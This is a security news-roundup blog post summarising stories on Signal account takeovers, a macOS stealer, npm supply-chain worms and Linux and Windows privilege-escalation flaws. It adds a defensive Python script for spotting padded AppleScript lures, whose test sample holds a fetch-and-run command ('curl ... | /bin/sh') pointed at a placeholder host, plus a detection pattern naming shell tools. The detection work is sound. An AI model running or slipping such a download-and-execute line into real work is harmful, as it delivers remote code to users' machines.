2026.05.19 News You Should Know


Series: News You Should Know

Errata

Poland builds its own Signal amid security concerns - Beyond Signal support staff impersonation, the agencies said the attacks can also involve outsiders persuading victims to surrender their verification codes or PINs, or abusing the platform’s Linked Devices feature via QR codes to take control of accounts.

Do fear the Reaper - stealer swipes macOS users’ passwords, wallets, then backdoors them - Assuming that the machine is located elsewhere and the user clicks on the fake tool installer, they open Apple’s Script Editor app via a sneaky link that’s heavily padded with ASCII art and fake terms to push the malicious command far below the visible portion of the window when it loads.
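The padding trick described above is simple to spot once you look for it: a script whose first real command sits dozens of lines below a wall of comments, ASCII art and fake license text. The heuristic below is an added example written for this post, not code from the article or from the malware; it assumes the lure is a script handed to Script Editor (AppleScript syntax, with the payload in a `do shell script` call), and the two inputs are constructed samples that imitate the layout, not captured artifacts.

```python
import re

# AppleScript statements that actually do something when Script Editor runs the file.
# Anything else (comments, ASCII art, "terms" prose) is treated as padding.
CODE_RE = re.compile(
    r'^\s*(tell|end|set|do shell script|display|if|else|repeat|on |try|'
    r'return|activate|delay|with timeout)\b'
)
# Commands worth flagging when they appear deep inside an otherwise inert script.
SHELL_RE = re.compile(r'do shell script|curl\b|osascript|bash -c|/bin/sh|base64', re.IGNORECASE)


def is_padding(line):
    """Blank lines, comments, ASCII art and prose count as padding, not code."""
    s = line.strip()
    if not s or s.startswith('--') or s.startswith('#') or s.startswith('(*'):
        return True
    return CODE_RE.match(s) is None


def analyze(script_text, visible_lines=40):
    """Locate the first real shell invocation and measure how much padding precedes it.

    visible_lines is an assumed approximation of how many lines fit in the
    Script Editor window at its default size; tune it for your own displays.
    """
    lines = script_text.splitlines()
    first_cmd = next(
        (i for i, l in enumerate(lines) if SHELL_RE.search(l) and not is_padding(l)),
        None,
    )
    if first_cmd is None:
        return {"total_lines": len(lines), "first_shell_line": None,
                "padding_before": 0, "suspicious": False}
    padding = sum(is_padding(l) for l in lines[:first_cmd])
    pad_ratio = padding / first_cmd if first_cmd else 0.0
    return {
        "total_lines": len(lines),
        "first_shell_line": first_cmd + 1,          # 1-based, as an editor shows it
        "padding_before": padding,
        # Suspicious when the command is pushed below the visible area by near-pure padding.
        "suspicious": first_cmd + 1 > visible_lines and pad_ratio >= 0.9,
    }


def build_padded_sample(padding_lines=60):
    """Constructed sample imitating the article's description: art and fake terms, then the payload."""
    art = [
        "--  " + ("#" * 40) if i % 2 == 0 else "--  By clicking Run you accept the license terms."
        for i in range(padding_lines)
    ]
    # example.invalid is a reserved name; this is not a real stager URL.
    payload = 'do shell script "curl -fsSL http://example.invalid/stage2 | /bin/sh"'
    return "\n".join(art + [payload])


# Constructed benign script: the shell call is on line 3, in plain view.
BENIGN_SAMPLE = "\n".join([
    '-- Greet the user, then list the home folder',
    'display dialog "Hello"',
    'set home_listing to do shell script "ls ~"',
])


if __name__ == "__main__":
    print(analyze(build_padded_sample()))
    print(analyze(BENIGN_SAMPLE))
```

Run it over any `.applescript`/`.scpt` text you have exported, or over the decoded body of a suspicious `applescript://` URL; the interesting field is the gap between `first_shell_line` and what fits on screen, not the mere presence of `do shell script`, which plenty of legitimate scripts use.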

Android Adds Intrusion Logging for Sophisticated Spyware Forensics - The feature, it added, was developed in partnership with Amnesty International and Reporters Without Borders. According to a help document shared by Google, it logs device and network activities on a daily basis, including information about device behavior and the various applications that run on it.

The kinds of activities recorded are listed below:

  • App activity (e.g., when an app process starts)
  • App installations, updates, and uninstalls
  • Network connections like starting and stopping Wi-Fi, Bluetooth, DNS lookups, and IP addresses
  • File transfers to or from the device over USB
  • Changes to system certificates
  • When the device is locked or unlocked

Google also noted that the log data is end-to-end encrypted by the device and stored on Google servers. The encryption keys are secured by Google Account password and screen lock credentials, meaning the logs cannot be accessed by any third-party, including Google itself, apart from the device owner.

18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE - “An unauthenticated attacker, along with conditions beyond its control, can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process, leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR) disabled, code execution is possible.”

Popular node-ipc npm package compromised to steal credentials - The recent supply-chain attack was detected by multiple application security companies, including Socket, Ox Security, and Upwind, who confirmed the following three versions as malicious:

The FBI Wants to Buy Nationwide Access to License Plate Readers - “The FBI has a crucial need for accessible LPRs to provide a diverse and reliable range of collections across the United States. This data should be available across major highways and in an array of locations for maximum usefulness to law enforcement,” a statement of work, which describes what data the FBI is seeking access to, reads.

Breaches

Foxconn confirms cyberattack claimed by Nitrogen ransomware gang - The incident was confirmed by a Foxconn spokesperson when BleepingComputer asked the company to confirm claims by the Nitrogen ransomware operation earlier this week that they had stolen 8 TB of data and more than 11 million documents. Foxconn is the world’s largest electronics manufacturer, ranked 28th in the Fortune Global 500, manufacturing for Apple, Nvidia, Intel, Google, et al.

Iranian hackers targeted major South Korean electronics maker - Researchers at Symantec say that the threat actor “spent a week inside the network of a major South Korean electronics manufacturer in February 2026.”

Linux

Dirty Frag gets a sequel as Fragnesia hands Linux attackers root-level access - According to researcher Hyunwoo Kim, who uncovered Dirty Frag, “Fragnesia” emerged as an unintended side effect of patches shipped to fix the original Dirty Frag vulnerabilities, adding yet another entry to the long tradition of security fixes accidentally creating new security problems.

Exploit available for new DirtyDecrypt Linux root escalation flaw - This limits the attack surface to Linux distributions that closely follow the latest upstream kernel releases, including Fedora, Arch Linux, and openSUSE Tumbleweed. However, V12’s proof-of-concept exploit has only been tested against Fedora and the mainline Linux kernel.

Shai Hulud

Malware crew TeamPCP open-sources its Shai-Hulud worm on GitHub - “TeamPCP isn’t just spreading malware anymore – they’re spreading capability. By going open source, they’ve handed any willing actor the tools to build their own variant. The copycats are already here,” Ox opined.

Malware crew TeamPCP open-sources its Shai-Hulud worm on GitHub - An npm account compromise infected 314 npm packages with malware, including size-sensor, echarts-for-react, timeago.js, and packages scoped to @antv, in a 22-minute burst of activity in the early hours of Tuesday morning. The most popular impacted package is size-sensor, downloaded 4.2 million times per month, followed by echarts-for-react (3.8 million), @antv/scale (2.2 million) and timeago.js (1.15 million).

Shai-Hulud copycat hits another npm package - A Shai-Hulud copycat has turned up in yet another npm package just five days after TeamPCP open sourced the worm and announced a supply-chain attack competition on BreachForums.

BreachForums & TeamPCP Promote Supply Chain Competition as Cybercrime Gets Gamified - Shai Hulud offers a $1000 USD prize for the largest supply chain competition. Rules:

  • You must utilize Shai Hulud Worms
  • You must include your Breachforums account handle and proof of your attack
  • Largest single or Largest cumulative breach wins.

Windows

Disgruntled researcher releases two more Microsoft zero-days - Nightmare-Eclipse described YellowKey as “one of the most insane discoveries I ever found.” They provided the files, which have to be loaded onto a USB drive, and if the attacker completes the key sequence correctly, they are granted unrestricted shell access to a BitLocker-protected machine.

MiniPlasma Windows 0-Day Enables SYSTEM Privilege Escalation on Fully Patched Systems - “I’m unsure if Microsoft just never patched the issue or the patch was silently rolled back at some point for unknown reasons. The original PoC by Google worked without any changes,” the researcher added. “To highlight this issue, I weaponized the original PoC to spawn a SYSTEM shell. It seems to work reliably in my machines but success rate may vary since it’s a race condition.”

I’m an experienced home cook, security engineer, people leader, and dedicated father and husband. I can be found on Mastodon at @IAintShootinMis@DigitalDarkAge.cc and on Signal at DigitalDarkAge.98. An RSS Feed of this blog is available here and a copy of my current OPML file is here.